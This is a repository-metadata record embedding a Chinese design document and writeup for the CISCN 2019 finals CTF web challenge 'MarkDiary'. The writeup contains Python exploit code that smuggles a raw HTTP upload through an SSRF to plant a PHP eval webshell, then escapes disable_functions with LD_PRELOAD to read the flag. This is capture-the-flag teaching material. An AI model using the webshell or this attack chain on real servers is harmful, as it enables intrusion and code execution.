{"id":18818983,"url":"https://github.com/imagemlt/ciscn_2019_final_pmarkdown","last_synced_at":"2025-04-13T23:32:56.252Z","repository":{"id":201349447,"uuid":"199170784","full_name":"imagemlt/CISCN_2019_final_pmarkdown","owner":"imagemlt","description":"国赛决赛web11 pmarkdown(垃圾题目，师傅们见笑了","archived":false,"fork":false,"pushed_at":"2019-07-27T13:52:45.000Z","size":5304,"stargazers_count":21,"open_issues_count":0,"forks_count":2,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-03-27T13:46:09.429Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/imagemlt.png","metadata":{"files":{"readme":"readme.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2019-07-27T13:50:50.000Z","updated_at":"2025-02-23T00:08:23.000Z","dependencies_parsed_at":null,"dependency_job_id":"8870c082-49b4-4b93-9c64-e176ac281f4e","html_url":"https://github.com/imagemlt/CISCN_2019_final_pmarkdown","commit_stats":null,"previous_names":["imagemlt/ciscn_2019_final_pmarkdown"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/imagemlt%2FCISCN_2019_final_pmarkdown","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/imagemlt%2FCISCN_2019_final_pmarkdown/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/imagemlt%2FCISCN_2019_final_pmarkdown/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/imagemlt%2FCISCN_2019_final_pmarkdown/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/imagemlt","download_url":"https://codeload.github.com/imagemlt/CISCN_2019_final_pmarkdown/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248796984,"owners_count":21163062,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-08T00:19:43.310Z","updated_at":"2025-04-13T23:32:52.134Z","avatar_url":"https://github.com/imagemlt.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"# 赛题设计说明\r\n\r\n## 题目信息：\r\n\r\n* 题目名称：MarkDiary\r\n* 预估难度：中等偏难 （简单/中等偏易/中等偏难/困难）\r\n\r\n\r\n## 题目描述：\r\n```\r\nMy Mark Diary level 2\r\n```\r\n\r\n## 题目考点：\r\n```\r\n1. 逆向php拓展\r\n2. SSRF\r\n3. bypass disable_functions via LD_PRELOAD\r\n```\r\n\r\n## 思路简述：\r\n进入网站后，有一篇博文给出了提示：本文使用了一个自研的php markdown拓展。因此我们可以下载该拓展文件，逆向后可知该拓展中存在一处SSRF漏洞。上传文件的功能点存在请求IP源检测，可以利用这里的ssrf上传webshell。该拓展中存在调用外部程序，因此可以利用LD_PRELOAD绕过disable_functions。\r\n\r\n\r\n## 题目提示：\r\n1. SSRF\r\n2. .htaccess php://filter\r\n3. LD_PRELOAD\r\n\r\n\r\n## 原始 flag 及更新命令：\r\n\r\n```shell\r\n    # 原始 flag\r\n    flag{flag_test}\r\n    # ..\r\n    # 更新 flag 命令\r\n    echo 'flag{85c2a01a-55f7-442a-8712-3f6908e1463a}' \u003e /flag\r\n```\r\n\r\n\r\n## 题目环境：\r\n```\r\n1. ubuntu 14.04 LTS（更新到最新）\r\n2. Apache/2.4.7 (Ubuntu)\r\n3. PHP 5.5.9-1ubuntu4.25\r\n```\r\n\r\n## 题目制作过程：\r\n1. 设计好漏洞，编写php相关代码\r\n2. 按照“Docker示例文档.md”来编写Dockerfile，制作好镜像。\r\n\r\n## 题目writeup：\r\n![1](./img/1.png)\r\n    伪协议读源码\r\n* 逆向pmarkdown.so可发现一处SSRF，从而访问upload.php\r\n```python\r\ndata='504f5354202f75706c6f61642e70687020485454502f312e310d0a486f73743a203132372e302e302e313a383038300d0a557365722d4167656e743a204d6f7a696c6c612f352e3020284d6163696e746f73683b20496e74656c204d6163204f5320582031302e31333b2072763a36362e3029204765636b6f2f32303130303130312046697265666f782f36362e300d0a4163636570743a20746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c2a2f2a3b713d302e380d0a4163636570742d4c616e67756167653a207a682c656e2d55533b713d302e372c656e3b713d302e330d0a526566657265723a20687474703a2f2f3132372e302e302e313a383038302f696e6465782e7068703f6163743d75706c6f61640d0a436f6e74656e742d547970653a206d756c7469706172742f666f726d2d646174613b20626f756e646172793d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d363639333633383838313437393532323633303632333639333739370d0a436f6e74656e742d4c656e6774683a203234340d0a436f6e6e656374696f6e3a20636c6f73650d0a557067726164652d496e7365637572652d52657175657374733a20310d0a0d0a2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d363639333633383838313437393532323633303632333639333739370d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2266696c65223b2066696c656e616d653d226c6f676f75742e706870220d0a436f6e74656e742d547970653a20746578742f7068700d0a0d0a3c3f706870200d0a6576616c28245f524551554553545b615d293b0a0d0a2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d363639333633383838313437393532323633303632333639333739372d2d0d0a'.replace('\\n','')\r\n    data=data.decode('hex')\r\n    requests.post(url+'/index.php',data={'debug':\"sadfas HTTP/1.1\\r\\nHOST:localhost\\r\\nConnection:Keep-Alive\\r\\n\\r\\n%s\\r\\n\"%data},timeout=timeout)\r\n```\r\n* LD_PRELOAD绕过disable_functions结合pmarkdown插件getshell\r\n```python\r\nrequests.post(url+'/index.php',data={'debug':\"sadfas HTTP/1.1\\r\\nHOST:localhost\\r\\nConnection:Keep-Alive\\r\\n\\r\\n%s\\r\\n\"%data},timeout=timeout)\r\n    requests.post(url+'/post.php?md=logout.md',data={\r\n        'a':'move_uploaded_file($_FILES[\"aaa\"][\"tmp_name\"],\"/tmp/test.so\");'\r\n    },\r\n        files={\"aaa\":(\"filename1\", open(\"test.so\", \"rb\"))},\r\n        timeout=timeout)\r\n    requests.post(url+'/post.php?md=logout.md',data={'a':'putenv(\"LD_PRELOAD=/tmp/test.so\");pmark_read(\"posts/logout.md\");'},timeout=timeout)\r\n    data=requests.post(url+'/post.php?md=logout.md',data={\r\n        'a':'print_r(file_get_contents(\"/tmp/flag\"));'\r\n    }).content\r\n    info=re.search(r'flag\\{.*\\}',data)\r\n    return info.group(0)\r\n\r\n```\r\n\r\n## 注意事项\r\n\r\n1. 题目名称不要有特殊符号，可用下划线代替空格；\r\n2. 根据设计的赛题，自行完善所有文件夹中的信息；\r\n3. 此文件夹下信息未完善的队伍，将扣除一定得分。\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fimagemlt%2Fciscn_2019_final_pmarkdown","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fimagemlt%2Fciscn_2019_final_pmarkdown","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fimagemlt%2Fciscn_2019_final_pmarkdown/lists"}